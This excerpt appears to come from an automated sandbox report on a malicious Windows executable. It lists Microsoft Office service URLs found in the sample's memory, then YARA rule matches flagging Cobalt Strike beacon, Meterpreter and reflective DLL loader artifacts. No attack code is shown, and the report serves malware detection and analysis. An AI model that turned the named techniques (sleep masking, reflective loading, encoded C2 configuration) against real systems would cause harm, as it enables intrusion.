Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://onedrive.live.com/embed?
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://osi.office.net
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://otelrules.azureedge.net
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://outlook.office.com
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://outlook.office.com/
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://outlook.office365.com
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://outlook.office365.com/
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://pages.store.office.com/review/query
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://powerlift.acompli.net
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectory
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://roaming.edog.
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://settings.outlook.com
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://shell.suite.office.com:1443
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://skyapi.live.net/Activity/
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://staging.cortana.ai
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://store.office.cn/addinstemplate
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://store.office.de/addinstemplate
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://tasks.office.com
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://web.microsoftstream.com/video/
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://webshell.suite.office.com
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://wus2.contentsync.
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://wus2.pagecontentsync.
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://www.odwebp.svc.ms

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: 3.2.????????????.exe.25bf8a60000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects CobaltStrike sleep_mask decoder Author: yara@s3c.za.net
Source: 3.2.????????????.exe.25bf8a60000.2.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 3.2.????????????.exe.25bf8a60000.2.raw.unpack, type: UNPACKEDPEMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 3.2.????????????.exe.25bf8a60000.2.raw.unpack, type: UNPACKEDPEMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 3.2.????????????.exe.25bf8a60000.2.raw.unpack, type: UNPACKEDPEMatched rule: Rule for beacon sleep obfuscation routine Author: unknown
Source: 3.2.????????????.exe.25bf8a60000.2.raw.unpack, type: UNPACKEDPEMatched rule: Rule for beacon reflective loader Author: unknown
Source: 3.2.????????????.exe.c000294000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects CobaltStrike sleep_mask decoder Author: yara@s3c.za.net
Source: 3.2.????????????.exe.c000294000.1.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 3.2.????????????.exe.c000294000.1.raw.unpack, type: UNPACKEDPEMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 3.2.????????????.exe.c000294000.1.raw.unpack, type: UNPACKEDPEMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 3.2.????????????.exe.c000294000.1.raw.unpack, type: UNPACKEDPEMatched rule: Rule for beacon sleep obfuscation routine Author: unknown
Source: 3.2.????????????.exe.c000294000.1.raw.unpack, type: UNPACKEDPEMatched rule: Rule for beacon reflective loader Author: unknown
Source: 3.2.????????????.exe.c000294000.1.unpack, type: UNPACKEDPEMatched rule: Detects CobaltStrike sleep_mask decoder Author: yara@s3c.za.net
Source: 3.2.????????????.exe.c000294000.1.unpack, type: UNPACKEDPEMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 3.2.????????????.exe.c000294000.1.unpack, type: UNPACKEDPEMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 3.2.????????????.exe.c000294000.1.unpack, type: UNPACKEDPEMatched rule: Rule for beacon sleep obfuscation routine Author: unknown
Source: 3.2.????????????.exe.c000294000.1.unpack, type: UNPACKEDPEMatched rule: Rule for beacon reflective loader Author: unknown
Source: 3.2.????????????.exe.25bf8a60000.2.unpack, type: UNPACKEDPEMatched rule: Detects CobaltStrike sleep_mask decoder Author: yara@s3c.za.net
Source: 3.2.????????????.exe.25bf8a60000.2.unpack, type: UNPACKEDPEMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 3.2.????????????.exe.25bf8a60000.2.unpack, type: UNPACKEDPEMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 3.2.????????????.exe.25bf8a60000.2.unpack, type: UNPACKEDPEMatched rule: Rule for beacon sleep obfuscation routine Author: unknown
Source: 3.2.????????????.exe.25bf8a60000.2.unpack, type: UNPACKEDPEMatched rule: Rule for beacon reflective loader Author: unknown
Source: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 Author: FireEye
Source: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects CobaltStrike sleep_mask decoder Author: yara@s3c.za.net
Source: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon sleep obfuscation routine Author: unknown
Source: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
Source: 00000003.00000002.706659139.000000C000294000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects CobaltStrike sleep_mask decoder Author: yara@s3c.za.net
Source: 00000003.00000002.706659139.000000C000294000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000003.00000002.706659139.000000C000294000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 00000003.00000002.706659139.000000C000294000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 00000003.00000002.706659139.000000C000294000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon sleep obfuscation routine Author: unknown
Source: 00000003.00000002.706659139.000000C000294000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
Source: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects CobaltStrike sleep_mask decoder Author: yara@s3c.za.net
Source: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon sleep obfuscation routine Author: unknown
Source: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
Source: Process Memory Space: ????????????.exe PID: 3016, type: MEMORYSTRMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 3.2.????????????.exe.25bf8a60000.2.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_Meterpreter_inMemory date = 2020-06-29, author = netbiosX, Florian Roth, description = Detects Meterpreter in-memory, score = , reference = https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/
Source: 3.2.????????????.exe.25bf8a60000.2.raw.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 3.2.????????????.exe.25bf8a60000.2.raw.unpack, type: UNPACKEDPEMatched rule: Cobaltbaltstrike_Beacon_x64 author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 3.2.????????????.exe.25bf8a60000.2.raw.unpack, type: UNPACKEDPEMatched rule: CobaltStrike_Sleep_Decoder_Indicator date = 2021-07-19, author = yara@s3c.za.net, description = Detects CobaltStrike sleep_mask decoder
Source: 3.2.????????????.exe.25bf8a60000.2.raw.unpack, type: UNPACKEDPEMatched rule: CobaltStrike_C2_Encoded_XOR_Config_Indicator date = 2021-07-08, author = yara@s3c.za.net, description = Detects CobaltStrike C2 encoded profile configuration
Source: 3.2.????????????.exe.25bf8a60000.2.raw.unpack, type: UNPACKEDPEMatched rule: CobaltStrike_MZ_Launcher date = 2021-07-08, author = yara@s3c.za.net, description = Detects CobaltStrike MZ header ReflectiveLoader launcher
Source: 3.2.????????????.exe.25bf8a60000.2.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_CobaltStrike_SleepMask_Jul22 date = 2022-07-04, author = CodeX, description = Detects static bytes in Cobalt Strike 4.5 sleep mask function that are not obfuscated, score = , reference = https://codex-7.gitbook.io/codexs-terminal-window/blue-team/detecting-cobalt-strike/sleep-mask-kit-iocs
Source: 3.2.????????????.exe.25bf8a60000.2.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 3.2.????????????.exe.25bf8a60000.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 3.2.????????????.exe.25bf8a60000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 3.2.????????????.exe.25bf8a60000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 3.2.????????????.exe.25bf8a60000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
Source: 3.2.????????????.exe.25bf8a60000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 3.2.????????????.exe.c000294000.1.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_Meterpreter_inMemory date = 2020-06-29, author = netbiosX, Florian Roth, description = Detects Meterpreter in-memory, score = , reference = https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/
Source: 3.2.????????????.exe.c000294000.1.raw.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 3.2.????????????.exe.c000294000.1.raw.unpack, type: UNPACKEDPEMatched rule: Cobaltbaltstrike_Beacon_x64 author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 3.2.????????????.exe.c000294000.1.raw.unpack, type: UNPACKEDPEMatched rule: CobaltStrike_Sleep_Decoder_Indicator date = 2021-07-19, author = yara@s3c.za.net, description = Detects CobaltStrike sleep_mask decoder
Source: 3.2.????????????.exe.c000294000.1.raw.unpack, type: UNPACKEDPEMatched rule: CobaltStrike_C2_Encoded_XOR_Config_Indicator date = 2021-07-08, author = yara@s3c.za.net, description = Detects CobaltStrike C2 encoded profile configuration
Source: 3.2.????????????.exe.c000294000.1.raw.unpack, type: UNPACKEDPEMatched rule: CobaltStrike_MZ_Launcher date = 2021-07-08, author = yara@s3c.za.net, description = Detects CobaltStrike MZ header ReflectiveLoader launcher
Source: 3.2.????????????.exe.c000294000.1.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_CobaltStrike_SleepMask_Jul22 date = 2022-07-04, author = CodeX, description = Detects static bytes in Cobalt Strike 4.5 sleep mask function that are not obfuscated, score = , reference = https://codex-7.gitbook.io/codexs-terminal-window/blue-team/detecting-cobalt-strike/sleep-mask-kit-iocs
Source: 3.2.????????????.exe.c000294000.1.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 3.2.????????????.exe.c000294000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 3.2.????????????.exe.c000294000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 3.2.????????????.exe.c000294000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 3.2.????????????.exe.c000294000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
Source: 3.2.????????????.exe.c000294000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 3.2.????????????.exe.c000294000.1.unpack, type: UNPACKEDPEMatched rule: HKTL_Meterpreter_inMemory date = 2020-06-29, author = netbiosX, Florian Roth, description = Detects Meterpreter in-memory, score = , reference = https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/
Source: 3.2.????????????.exe.c000294000.1.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 3.2.????????????.exe.c000294000.1.unpack, type: UNPACKEDPEMatched rule: Cobaltbaltstrike_Beacon_x64 author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 3.2.????????????.exe.c000294000.1.unpack, type: UNPACKEDPEMatched rule: CobaltStrike_Sleep_Decoder_Indicator date = 2021-07-19, author = yara@s3c.za.net, description = Detects CobaltStrike sleep_mask decoder
Source: 3.2.????????????.exe.c000294000.1.unpack, type: UNPACKEDPEMatched rule: CobaltStrike_C2_Encoded_XOR_Config_Indicator date = 2021-07-08, author = yara@s3c.za.net, description = Detects CobaltStrike C2 encoded profile configuration
Source: 3.2.????????????.exe.c000294000.1.unpack, type: UNPACKEDPEMatched rule: CobaltStrike_MZ_Launcher date = 2021-07-08, author = yara@s3c.za.net, description = Detects CobaltStrike MZ header ReflectiveLoader launcher
Source: 3.2.????????????.exe.c000294000.1.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 3.2.????????????.exe.c000294000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 3.2.????????????.exe.c000294000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 3.2.????????????.exe.c000294000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
Source: 3.2.????????????.exe.c000294000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 3.2.????????????.exe.25bf8a60000.2.unpack, type: UNPACKEDPEMatched rule: HKTL_Meterpreter_inMemory date = 2020-06-29, author = netbiosX, Florian Roth, description = Detects Meterpreter in-memory, score = , reference = https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/
Source: 3.2.????????????.exe.25bf8a60000.2.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 3.2.????????????.exe.25bf8a60000.2.unpack, type: UNPACKEDPEMatched rule: Cobaltbaltstrike_Beacon_x64 author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 3.2.????????????.exe.25bf8a60000.2.unpack, type: UNPACKEDPEMatched rule: CobaltStrike_Sleep_Decoder_Indicator date = 2021-07-19, author = yara@s3c.za.net, description = Detects CobaltStrike sleep_mask decoder
Source: 3.2.????????????.exe.25bf8a60000.2.unpack, type: UNPACKEDPEMatched rule: CobaltStrike_C2_Encoded_XOR_Config_Indicator date = 2021-07-08, author = yara@s3c.za.net, description = Detects CobaltStrike C2 encoded profile configuration
Source: 3.2.????????????.exe.25bf8a60000.2.unpack, type: UNPACKEDPEMatched rule: CobaltStrike_MZ_Launcher date = 2021-07-08, author = yara@s3c.za.net, description = Detects CobaltStrike MZ header ReflectiveLoader launcher
Source: 3.2.????????????.exe.25bf8a60000.2.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 3.2.????????????.exe.25bf8a60000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 3.2.????????????.exe.25bf8a60000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
